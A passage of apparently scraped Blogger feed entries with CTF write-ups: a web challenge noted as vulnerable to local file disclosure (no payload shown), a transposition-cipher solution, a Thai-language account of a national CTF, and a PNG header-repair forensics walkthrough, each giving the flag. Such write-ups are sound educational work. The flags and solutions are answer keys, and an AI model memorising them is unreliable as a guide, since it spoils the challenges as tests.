<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKaU2hTxQ-uv9qjhcAdRdYr_fVI0taBW0PT6bRpYuSZRKtjlE8HT8UUO4Uqw-gGnUfv4q-9aeD-RuKUac_o2rXBPzQZG-jzN9Fs1SkRSyhy4oKfUN8Ue24OzOeVYFORWYYNnE11oZTTdv2/s1600/sqlmap2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKaU2hTxQ-uv9qjhcAdRdYr_fVI0taBW0PT6bRpYuSZRKtjlE8HT8UUO4Uqw-gGnUfv4q-9aeD-RuKUac_o2rXBPzQZG-jzN9Fs1SkRSyhy4oKfUN8Ue24OzOeVYFORWYYNnE11oZTTdv2/s320/sqlmap2.PNG" width="320" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Flag:</b> <b><span style="color: red;">hxp{this_is_just_a_place_holder}</span></b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-47727674440761649802015-10-25T20:05:00.000+07:002015-10-25T20:05:00.127+07:00TUM CTF Teaser: neocities (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
So I hope you're well insured, because the nineties have sent us their best thing ever: bright colors and Comic Sans MS. Please end it before everyone dies due to internal bleedings. 1.ctf.link:1123</blockquote>
<b>Solution: </b><br />
<b><br /></b>
<b> </b>Parameter <b>page</b> have vulnerable to Local File Disclosure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH1XFG8kY53BCWsZtc2ASEMOqbnpqDIX_d0z21CZGafeTAGGFLH3upENyVOH185RCK3LJvfuSS88xMka0MFciQRgA6Vkz-jxryGcX5rPb5WOQqy6HoMjRKNYnGYHWAwxqK-tpsEEZ57Uby/s1600/neo.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH1XFG8kY53BCWsZtc2ASEMOqbnpqDIX_d0z21CZGafeTAGGFLH3upENyVOH185RCK3LJvfuSS88xMka0MFciQRgA6Vkz-jxryGcX5rPb5WOQqy6HoMjRKNYnGYHWAwxqK-tpsEEZ57Uby/s400/neo.PNG" width="400" /></a></div>
<br />
<b>Flag:</b> <span style="color: red;"><b>hxp{the_nineties_called_they_want_their_design_back}</b></span>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-85618875240365675852015-10-24T17:48:00.000+07:002015-10-24T17:48:24.569+07:00EKOPARTY CTF 2015: SCYTCRYPTO (Crypto) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
Decrypt this strange word: ERTKSOOTCMCHYRAFYLIPL</blockquote>
<b>Solution:</b><br />
<br />
<span style="color: red;">E</span>RT<span style="color: red;">K</span>SO<span style="color: red;">O</span>TC<span style="color: red;">M</span>CH<span style="color: red;">Y</span>RA<span style="color: red;">F</span>YL<span style="color: red;">I</span>PL<br />
EKO{MYFI<br />
<span style="color: red;">_</span><span style="color: red;">R</span>T<span style="color: red;">_</span><span style="color: red;">S</span>O<span style="color: red;">_</span><span style="color: red;">T</span>C<span style="color: red;">_</span><span style="color: red;">C</span>H<span style="color: red;">_</span><span style="color: red;">R</span>A<span style="color: red;">_</span><span style="color: red;">Y</span>L<span style="color: red;">_</span><span style="color: red;">P</span>L<br />
EKO{MYFIRSTCRYP<br />
<span style="color: red;">__T__O__C__H__A__L__L</span><br />
EKO{MYFIRSTCRYPTOCHALL}<br />
<br />
<b>Flag:</b> <span style="color: red;"><b>EKO{MYFIRSTCRYPTOCHALL}</b></span>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-74587945755377134402015-10-14T21:45:00.001+07:002015-10-16T22:49:22.875+07:00ประสบการณ์ทีม null ในการแข่งขัน Thailand CTF Competition 2015<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgieqr0IPXtxMd2aL4f0Mf5VRRrfDKzWmDl9aUPQLONdcIFeQiZ3d9vj2VWlcX_lY6fXl02VxCyFl2-YhgD95u43dfce5prOYO80yL8Bo67cHnLmwAo4xADqPTCo0x3b3UOUZ9Hf-nh7chJ/s1600/warroom.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgieqr0IPXtxMd2aL4f0Mf5VRRrfDKzWmDl9aUPQLONdcIFeQiZ3d9vj2VWlcX_lY6fXl02VxCyFl2-YhgD95u43dfce5prOYO80yL8Bo67cHnLmwAo4xADqPTCo0x3b3UOUZ9Hf-nh7chJ/s400/warroom.jpg" width="400" /></a></div>
<b><br /></b>
<br />
<h3>
<b>CTF WTF?</b></h3>
<br />
<b> </b>CTF ย่อมาจาก<b> </b>Capture The Flag[1] เป็นการแข่งขันด้านความปลอดภัยคอมพิวเตอร์ ที่เห็นบ่อยๆ คือมี 2 ประเภทคือ Jeopardy แนวถามตอบแก้โจทย์ในข้อต่างๆ เพื่อให้ได้มาซึ่ง Flag หรือข้อความและเพื่อเป็นกุญแจที่ใช้เพื่อปลดล๊อคผ่านข้อนั้น ซึ่งแต่ละข้อก็จะมีคะแนน ตามระดับความยากง่ายของข้อนั้นๆ อยู่เช่นกัน โดยจะมีหลายรูปแบบตาม Category ในหลายๆ ด้าน อีกประเภทคือ Attack-Defense การแข่งขันด้านความปลอดภัยคอมพิวเตอร์ในการเจาะระบบเชิงรุกและเชิงรับ กล่าวคือแฮกเครื่องคนอื่น เพื่อให้ได้มาซึ่ง Flag ในขณะเดียวกันก็ต้องป้องกันเครื่องตัวเองจากการถูกแฮกเช่นกัน รายละเอียดเพิ่มเติมดูได้<a href="https://www.youtube.com/watch?v=khXl3DHB_fI">ตามวีดีโอ</a>นี้ครับ[2]<br />
<b><br /></b>
<br />
<h3>
<b>Beside the point</b></h3>
<br />
ส่วนตัวผมก็เล่น CTF อยู่บ่อยๆ เพราะติดตามงานแข่งใน <a href="https://ctftime.org/">https://ctftime.org/</a> ถ้ามีเวลา และทุกครั้งที่เล่นจะเขียน Write-up หรือเฉลยบางข้อเป็นภาษาอังกฤษไว้ใน<a href="http://icheernoom.blogspot.com/search/label/ctf">บล๊อกนี้</a>[3]<br />
ครั้งนี้เป็นการแข่งแฮกครั้งที่ 2 ของผม ครั้งแรกนั้นแข่งของ <a href="http://icheernoom.blogspot.com/2014/05/my-first-web-security-contest.html">FITWHEY</a>[4] แข่งแฮกเว็บแต่ไม่เจอเว็บให้แฮกเลย เจอแต่เครื่องของผู้เข้าแข่งขันคนอื่น กำ<br />
<br />
<h3>
<b>Member of null team</b></h3>
<div>
<br /></div>
- ผมหนุ่ม (icheernoom)<br />
- น้องพี (pe3z)<br />
- นัย (ziperz)<br />
<h3>
<b><br /></b></h3>
<h3>
<b>Qualification Round (Online)</b></h3>
<br />
เริ่มแข่งขันรอบ Online วันที่ 5 กันยายน เวลา 11.00 นัดกันว่าจะไปเล่นกันที่ร้าน NE8T แต่นัยไม่สบายเลยขอนั่งทำโจทย์อยู่ที่ห้อง และติดต่อกันผ่าน Facebook Group Chat ผมนั่งอยู่ร้าน NE8T กับน้องพีสั่งอะไรมากินกันได้ password wifi มาหาที่นั่งใกล้ๆปลั๊กไฟ ตั้งคอมฯได้ จนถึงเริ่มแข่งมีปัญหาในการ Login เล็กน้อยเลยโทรไปหาเพื่อเปลี่ยนรหัสผ่าน จึงทำให้สามารถเข้าแข่งขันได้ จากนั้นก็ได้เขียนสิ่งที่ทำลงใน Google Docs เพื่อแชร์กันว่าใครทำอะไรไปบ้างแล้ว จากนั้นก็ช่วยๆ กันทำโจทย์เรื่อยๆ มาติดปัญหาข้อรูป ที่แก้ file signature หรือ magic number ให้เป็น jpg เปิดรูปมาเอาไป Google image search เจอสถานที่ตอบ Colorado State Capitol ก็ตอบผิดจนไม่รู้จะตอบอะไรแล้ว orz แต่ก็ยังไม่รู้ว่าเฉลยคืออะไรกันแน่ น้องพีเปิดด้วยข้อที่เป็นไฟล์เสียง ผมจัดข้อที่เป็น Web ข้อเดียว ส่วนข้อดู Access Log ที่ Flag เป็น sha256 ของ timestamp ที่ upload shell เข้าไปที่ Server ได้ พอเจอ timestamp ที่คิดว่าใช่ จึงเอาไปเข้าเว็บ sha256 แล้วตอบยังไงก็ผิด คิดว่าน่าจะเป็นที่เว็บ พอเปลี่ยนเว็บที่ใช้เข้า sha256 ตอบได้เลย จำไม่ได้แล้วว่าเว็บไหน -..- ทางนัยก็แงะข้อที่มี 2 flag มา concat กันและข้ออื่นๆ ช่วยๆกันทำ ระหว่างแข่งขันน้องพีบอกอยากขึ้นไปต่อท้ายทีม Pwnladin ซึ่งผมก็อยากทำอยู่นะ แต่ก็พยายามกันเต็มที่แล้ว ขึ้นไม่ไหว ฮาๆ<br />
ผมและน้องพีอยู่ร้าน NE8T ถึงประมาณ 2 ทุ่มจึงแยกย้ายกันกลับ แต่น้องพีรู้สึกจะกลับไปทำต่อจนแก้โจทย์ได้อีกประมาณ 2 ข้อ ไม่ได้นอน ส่วนผมกลับไปนอนและตื่นมาทำตอน 7 โมงจนหมดเวลาแต่ก็ไม่ได้มีข้อที่ทำได้เพิ่มจนเวลาล่วงเลยมาถึง 11.00 ของวันที่ 6 กันยายน หมดเวลาการแข่งขันรอบ Online<br />
จบการแข่งขันด้วยคะแนน 950 คะแนนเป็นอันดับที่ 7 จาก 8 ทีมเกือบไม่ผ่านรอบแรก จากนั้นไม่นานก็มี Email มาให้เรายืนยันตัว และนัดวันที่จะ Skype กับทีมงาน ThaiCERT พอถึงเวลากลายเป็นใช้ Google Hangout แทนเพราะมีปัญหาในการใช้งานของ Skype<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDU_8bIBm8-G4yQ6Bjbyj6_LQbI1JeQOE-v-SRm3EzWdNzdtRE1ztGIpcbirJc3XSsomzVzCw57cTGO8xC1s4K_RPyYWF2HlZpCVbPMVkiGNbelZPFB9EVaoalyjp3TY48LwUb5ARrlnV1/s1600/Qual.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDU_8bIBm8-G4yQ6Bjbyj6_LQbI1JeQOE-v-SRm3EzWdNzdtRE1ztGIpcbirJc3XSsomzVzCw57cTGO8xC1s4K_RPyYWF2HlZpCVbPMVkiGNbelZPFB9EVaoalyjp3TY48LwUb5ARrlnV1/s400/Qual.png" width="400" /></a></div>
<br />
<h3>
<b>Final Round (Onsite)</b></h3>
<br />
บ่ายวันที่ 4 ตุลาคม วันอาทิตย์ไปนั่งประชุมทีม null กันที่พักโรงแรมห้อง 2022 เพราะ check-in ได้แล้ว และมีพี่ทีมงานคอยต้อนรับอยู่ ตอนแรกไม่รู้ว่าโจทย์เป็น Jeopardy แนวถามตอบ นึกว่าเป็น Attack-Defense ก่อนหน้านั้นเห็น Email จากทีมงานว่า Require VMware กับ DVD Drive ซึ่งเครื่องผมกับนัย ไม่มี DVD Drive จึงโทรไปสอบถามทางทีมงาน จึงได้คำตอบว่าไม่มีก็ไม่เป็นไร เห็น Require ขอ VMware เลยนึกว่าเป็นแนวที่ให้ VM Image มาแล้วแกะหา Flag ไปเรื่อยๆ ทุกคนจึงอ่านแต่ Write-up ของ Vulnhub ซึ่งเป็น CTF ที่ให้ VMware มาก้อนหนึ่งเปิดขึ้นมาแล้วก็ทำยังไงก็ได้ให้ได้มาซึ่ง Flag ซึ่งจากที่อ่านต้อง root เครื่องทั้งนั้น พอมารู้ทีหลังว่าเป็นการแข่งขันแบบ Jeopardy เลยโล่งใจขึ้นมาหน่อย ฮา ทุกคนเลยมานั่งอ่าน SECCON CTF 2014 Write-up กันอย่างเมามันส์<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-xtEwTu7Lt3BnJ8NstrFbWeWPdZ0MNe43quoRZv_tFO6jRYE2Q0g7FLRAcscjyysQHAaOwRBgA0j2MAtj9Oy_daOz0q9WF9l6KMYcy6Orgs8rqZhajIwTjKMUn9wS0sqo39JuZGeMy9Yh/s1600/hotel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-xtEwTu7Lt3BnJ8NstrFbWeWPdZ0MNe43quoRZv_tFO6jRYE2Q0g7FLRAcscjyysQHAaOwRBgA0j2MAtj9Oy_daOz0q9WF9l6KMYcy6Orgs8rqZhajIwTjKMUn9wS0sqo39JuZGeMy9Yh/s400/hotel.jpg" width="400" /></a></div>
<br />
<br />
เช้าวันที่ 5 ตุลาคมทางทีมงานก็บรีฟให้ฟังว่าพรุ่งนี้ต้องทำอะไรบ้าง มีกิจกรรมอะไรบ้าง และแนะนำทีมงาน SECCON ที่มาออกแบบโจทย์ให้และบอกว่าอย่าเพิ่ง Write-up เพราะจะใช้โจทย์นี้กับอีก 3 หรือ 4 ประเทศนี่แหละผมฟังไม่ชัดเขาพูดภาษาอังกฤษสำเนียงญี่ปุ่น โดยส่วนตัวผมก็เคยเข้าร่วมการแข่งขัน SECCON CTF 2014 ในรอบ Online และเขียน <a href="http://icheernoom.blogspot.com/search/label/SECCON%20CTF%202014">Write-up</a> ไว้[5] จากนั้นตอนบ่ายก็ประชุมทีม เตรียมเครื่องมือและโปรแกรม ก็มีการถามในทีมว่ามี Kali ไหม มี Burp suite ไหม มี wordlist สำหรับ Brute force ไหม ฯลฯ ซึ่งก็มีกันทุกคน โดยในช่วงเที่ยงที่ผ่านมาทางทีมงานมีเสื้อฟรีให้ที่บอกไซต์ไปตั้งแต่ยืนยันตัวตนและมีอาหารมาให้ซึ่งเป็นโออิชิอะไรสักอย่างจำไม่ได้แต่น่าจะแพง กินเสร็จก็นั่งอ่าน Write-up ที่คิดว่าน่าจะมีแนวว่าอาจจะเจอในโจทย์วันพรุ่งนี้ และแชร์ Write-up จากงานอื่นๆ ที่ตัวเองคิดว่าน่าสนใจกับสมาชิกคนอื่นๆ ในทีม<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1V5zInBqkCqk11mYb004Kqs89543hv9Zgih4Jk7TlUgDxHYkQT5M0Ab6YkLsLL4Np26c-0cVoD59cZ6LJOBaWet2HgrEGomt8eYlxa6uWvBAkNzVCycQ8tQ8mMy3dhD133TWmvAh08gm2/s1600/nullteam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1V5zInBqkCqk11mYb004Kqs89543hv9Zgih4Jk7TlUgDxHYkQT5M0Ab6YkLsLL4Np26c-0cVoD59cZ6LJOBaWet2HgrEGomt8eYlxa6uWvBAkNzVCycQ8tQ8mMy3dhD133TWmvAh08gm2/s400/nullteam.jpg" width="400" /></a></div>
<br />
เช้าวันที่ 6 ตุลาคมเป็นวันแข่งที่ The 9th Towers ตอนเช้าก็เข้าร่วมพิธีการเปิดงาน Security Health Check Day และการแข่งขันก็ถูกจัดอยู่อีกห้องหนึ่ง การแข่งขันเริ่มขึ้นเวลาประมาณ 10.00 น. มีโต๊ะให้นั่งเป็นโต๊ะกลม นั่งเหมือนล้อมวงกัน ตอนนั้นตื่นเต้นมากๆ หิวข้าวด้วยเพราะกินไปแค่นมกับขนมปัง กว่าจะได้กินก็ตอนแข่งเสร็จ กินพิซซ่า<br />
เริ่มการแข่งขัน ทางทีมงานมีสายแลนให้คนละเส้น เสียบแล้วได้ IP เลยเพราะเป็น DHCP หลังจากได้ IP มาก็เข้าเว็บที่ทางทีมงานจัดเตรียมไว้ให้ ผมเล่นบน VMware 2 ตัวคือ Ubuntu ที่ใช้อยู่ปกติและ Kali 2.0 ที่เตรียมมาสำหรับงานนี้โดยเฉพาะ เลยตั้งค่า Network Adapter เป็นแบบ Bridged connection ออกไปหา Network ข้างนอก<br />
พอเริ่มทำไปสักพักส่วนมากผมจะทำข้อ Web ก็ได้ตกลงกันว่าเจอโจทย์ข้อ Web เดี๋ยวผมจัดเอง ส่วนนัยจะเน้นทำข้อที่เกี่ยวกับ Network และน้องพีจะเน้นทำ Forensic, Binary ซึ่งโจทย์รอบ Final ดูจะง่ายกว่าโจทย์รอบ Qualification ความยาก-ง่ายของโจทย์ทั้งสองรอบนั้นแปรผกผันกับเวลา เพราะถ้ายากเกินไปอาจจะทำไม่ทัน โดยโจทย์ไม่ได้เปิดหมด ครั้งแรกที่เห็นโจทย์มีประมาณ 10 ข้อและค่อยๆ มาทีละประมาณ 5 ข้อจนครบ 29 ข้อโดยทีมงานจะเดินมาบอกว่ามีโจทย์ใหม่แล้วนะ (คนญี่ปุ่น) มีคะแนนพิเศษสำหรับทีมที่ตอบได้ทีมแรกโดยจะได้คะแนน 1% ของคะแนนข้อนั้น เช่น ถ้าทีมไหนตอบข้อ 100 คะแนนได้ทีมแรกจะได้ คะแนนพิเศษ 1 คะแนน 200 คะแนนได้ 2 คะแนน เป็นต้น ซึ่งในทีมไม่มีใครตอบแล้วได้คะแนนพิเศษเลย เพราะไม่ทันทีมอื่น ถถถ -*- ระหว่างที่แข่งก็เห็น Scoreboard เคลื่อนไหวตลอดเวลา ทำให้ตื่นเต้นเข้าไปอีก คะแนนของทีม null ก็ขึ้นไปสูงสุดได้ที่ 2 ต่อท้าย Pwnladin ในช่วงแรกๆ จากนั้นร่วงรัวๆ 555<br />
จบการแข่งขันด้วยการแก้โจทย์ได้ 23 ข้อ ได้คะแนนไป 2710 คะแนน เป็นอันดับที่ 5 จาก 8 ทีมครับ<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNAOItS7Kk2dB_7qPWZtxVC-QaVzt7FT-bnIVSeZH7NtNAhGz64b4E6Qh8NX9kXPIEEN8ZqPc1bZ2LqCVUSipUsvfjg1Ozuv5biQgnPct43VYAI2f4Zd3hO_E7dLGVVgqATjsxuVxB0Hiz/s1600/Final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNAOItS7Kk2dB_7qPWZtxVC-QaVzt7FT-bnIVSeZH7NtNAhGz64b4E6Qh8NX9kXPIEEN8ZqPc1bZ2LqCVUSipUsvfjg1Ozuv5biQgnPct43VYAI2f4Zd3hO_E7dLGVVgqATjsxuVxB0Hiz/s400/Final.png" width="400" /></a></div>
<br />
<h3>
<b>Questions Solved by null team</b></h3>
<br />
<script src="https://gist.github.com/icheernoom/e228390841bbdb231a58.js"></script>
<br />
<h3>
<b>After Competition</b></h3>
<b><br /></b>
<b> </b>หลังจากเสร็จสิ้นการแข่งขันก็มีการมอบรางวัลก็จะมีรางวัลชนะเลิศเป็นทีม Pwnladin และรองชนะเลิศเป็นทีม asdfghjkl ส่วนทีม null ได้รางวัลชมเชยครับ ก็ได้เป็นเกียรติบัตร และเงินรางวัล 10,000 บาท หลังจากนั้นก็มี party มีอาหารให้ทาน หรูมากเช่นกัน พี่ที่เป็นพิธีกรฮามาก มีให้เล่นแนะนำตัวกันระหว่าง 8 ทีมที่เข้าร่วมการแข่งขัน จำชื่อให้ได้ให้ครบเกือบ 24 คน<br />
<br />
<h3>
<b>Summary</b></h3>
<br />
ขอบคุณ ThaiCERT, ETDA และ SECCON มากๆ ครับ ที่จัดการแข่งขันที่สนุกๆ แบบนี้ ถ้าปีหน้าจัดอีกก็จะลงแข่งอีกแน่นอน และขอแสดงความยินดีกับทีม Pwnladin และทีม asdfghjkl ที่ได้เป็นตัวแทนของประเทศไทย ไปแข่งต่อในงาน Cyber SEA Game ที่ประเทศอินโดนิเซียครับ<br />
<br />
<h3>
<b>Reference</b></h3>
<br />
1. <a href="https://ctftime.org/ctf-wtf/">CTF? WTF?</a><br />
2. <a href="https://www.youtube.com/watch?v=khXl3DHB_fI">แข่งแฮก CTF คืออะไร</a><br />
3. <a href="http://icheernoom.blogspot.com/search/label/ctf">http://icheernoom.blogspot.com/search/label/ctf</a><br />
4. <a href="http://icheernoom.blogspot.com/2014/05/my-first-web-security-contest.html">My first web security contest (FITWHEY + HyperHackathon)</a><br />
5. <a href="http://icheernoom.blogspot.com/search/label/SECCON%20CTF%202014">SECCON CTF 2014</a>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-4932173763932398652015-10-03T13:24:00.000+07:002015-10-04T21:57:53.367+07:00D-CTF 2015: She said it doesn't matter (Misc) Write-up<div class="separator" style="clear: both; text-align: left;">
<b>Description:</b></div>
<blockquote class="tr_bq" style="clear: both; text-align: left;">
Void. Empty. Null.</blockquote>
<b>Solution:</b><br />
<b><br /></b>
1. Download m100.png and open it with default Image viewer, I found IHDR CRC error?<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWpgmiY-YbVAwxWNG8PGhlpMtnZ_arA-EzynqmcqMN68x-ySns9QYwz1hitzx1wVfsYAi1tPudN1pvLUvw4P5FNWBCYyULl64u7u9S9H7f2Pr7KFWMk3bzNNTYxCpWR-Fo6imv4nqhz-o7/s1600/m100.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWpgmiY-YbVAwxWNG8PGhlpMtnZ_arA-EzynqmcqMN68x-ySns9QYwz1hitzx1wVfsYAi1tPudN1pvLUvw4P5FNWBCYyULl64u7u9S9H7f2Pr7KFWMk3bzNNTYxCpWR-Fo6imv4nqhz-o7/s400/m100.png" width="400" /></a></div>
<br />
2. Check m100.png using <a href="http://www.libpng.org/pub/png/apps/pngcheck.html">pngcheck</a> and result below<br />
<pre class="brush:[bash]; highlight: 5;">root@ubuntu:~# pngcheck -v m100.png
File: m100.png (65141 bytes)
chunk IHDR at offset 0x0000c, length 13
666 x 519 image, 32-bit RGB+alpha, non-interlaced
CRC error in chunk IHDR (computed 3ff4fc62, expected 35468913)
</pre>
<br />
3. Try to <a href="http://www.w3.org/TR/PNG/#11IHDR">change IHDR value</a> from 35468913 to 3ff4fc62 in <a href="https://hex.it/">HexEd.it</a> online hex editor.<br />
<br />
Default value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKZPi7BPovZips-gHC89jAMZDILWEkMtLjd-0PeHwfCDrEiUCVt4pRtwasThj-RqojCWalMjTYplyfdiYxuLOjdJtAnyBLTF99QZ1qh0kaurGCF22UsbxxwKYfzP_IdsVnTGhL9glr2WtW/s1600/change1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKZPi7BPovZips-gHC89jAMZDILWEkMtLjd-0PeHwfCDrEiUCVt4pRtwasThj-RqojCWalMjTYplyfdiYxuLOjdJtAnyBLTF99QZ1qh0kaurGCF22UsbxxwKYfzP_IdsVnTGhL9glr2WtW/s400/change1.png" width="400" /></a></div>
<br />
After change value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw82kcFew5ZehnriiXLWhcQLkIhguf6rUVcj8RYw5z6Kukz5oQ__zKJaqZ_myr_3YLwEezkPWkei5xnjEl7PTZWJZKpC4pwDnx_jHK1VKGCu2Fs2g8_iVjqSct1t4ydN8TGmGgByxF0DXM/s1600/change2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw82kcFew5ZehnriiXLWhcQLkIhguf6rUVcj8RYw5z6Kukz5oQ__zKJaqZ_myr_3YLwEezkPWkei5xnjEl7PTZWJZKpC4pwDnx_jHK1VKGCu2Fs2g8_iVjqSct1t4ydN8TGmGgByxF0DXM/s400/change2.png" width="400" /></a></div>
<br />
Export to view<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyWeoQuUPsNsZzWhrdbyBbePuVIGuQdDGDLvMWMP1FmdSPGhYxdG0fU9risuDNBYW7ZYDL6JSmkCIdDMF2ZG8OrBHUBOc1FFz03oV1WVkZjUclPvkDhCSWWAS0yGH8lWAVn-FHBldoJ6cE/s1600/m100_fix1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyWeoQuUPsNsZzWhrdbyBbePuVIGuQdDGDLvMWMP1FmdSPGhYxdG0fU9risuDNBYW7ZYDL6JSmkCIdDMF2ZG8OrBHUBOc1FFz03oV1WVkZjUclPvkDhCSWWAS0yGH8lWAVn-FHBldoJ6cE/s400/m100_fix1.png" width="400" /></a></div>
<br />
<br />
I think it may be enough, but not have flag. :(<br />
<br />
4. Try to <a href="http://stackoverflow.com/questions/11099931/trying-to-extract-pixel-values-from-a-given-png-image">change Image Height value</a> from 519 (207) to 550 (226), <a href="http://www.binaryhexconverter.com/decimal-to-hex-converter">Decimal to Hex</a> :)<br />
<br />
Default value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwwjjaJVTEVu1Hy0Zw1gxVIMaZqnHLgpnWF2WANaDydp3qdd645YtVqVZlz4T1rlKAwmqvPmgUWWmjjBHwA6xaSdCr9u3zdOoOZ3pFsHkDP-_zXJbz8xQGhwbcLSfB6mzDAcuS1u2X5S9z/s1600/change3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwwjjaJVTEVu1Hy0Zw1gxVIMaZqnHLgpnWF2WANaDydp3qdd645YtVqVZlz4T1rlKAwmqvPmgUWWmjjBHwA6xaSdCr9u3zdOoOZ3pFsHkDP-_zXJbz8xQGhwbcLSfB6mzDAcuS1u2X5S9z/s400/change3.png" width="400" /></a></div>
<br />
After change value and export to m100_fixsize.png.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEVWcYsSLfnCOzjRqgtF9QQi4HFEo0Pi6UU9pYUUehjKvTFgMFOOhYUs-RpQSBQ3h0ltFC7cn4zgCBQIF7fwRagTnolFMX1WRYtlZTsCq5I6gQZ4rDnNlVevEHCCdvP0fnXqcUfLlM6wUN/s1600/change4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEVWcYsSLfnCOzjRqgtF9QQi4HFEo0Pi6UU9pYUUehjKvTFgMFOOhYUs-RpQSBQ3h0ltFC7cn4zgCBQIF7fwRagTnolFMX1WRYtlZTsCq5I6gQZ4rDnNlVevEHCCdvP0fnXqcUfLlM6wUN/s400/change4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
5. Check m100_fixsize.png using <a href="http://www.libpng.org/pub/png/apps/pngcheck.html">pngcheck</a> again and result below<br />
<pre class="brush:[bash]; highlight: 5;">root@ubuntu:~# pngcheck -v m100_fixsize.png
File: m100_fixsize.png (65141 bytes)
chunk IHDR at offset 0x0000c, length 13
666 x 550 image, 32-bit RGB+alpha, non-interlaced
CRC error in chunk IHDR (computed f3042af1, expected 3ff4fc62)
ERRORS DETECTED in m100_fixsize.png
</pre>
<br />
6. Try to <a href="http://www.w3.org/TR/PNG/#11IHDR">change IHDR value</a> from 3ff4fc62 to f3042af1 in <a href="https://hex.it/">HexEd.it</a> online hex editor again.<br />
<br />
After change value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi466uAREpGl2f3oPNNIY3-ulg877-UvXki-ppzKSlFKPVB72DDF-Oc3Uns_YxXRo3wVUSsJX_n44rpOg3WOUUgVxNmBa4ZM06CY1SARGoyJXWsL8Hov-2hkxSHME0FGQopszweFAdMtdJy/s1600/change5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi466uAREpGl2f3oPNNIY3-ulg877-UvXki-ppzKSlFKPVB72DDF-Oc3Uns_YxXRo3wVUSsJX_n44rpOg3WOUUgVxNmBa4ZM06CY1SARGoyJXWsL8Hov-2hkxSHME0FGQopszweFAdMtdJy/s400/change5.png" width="400" /></a></div>
<br />
<div>
Export to view and get a flag :D</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
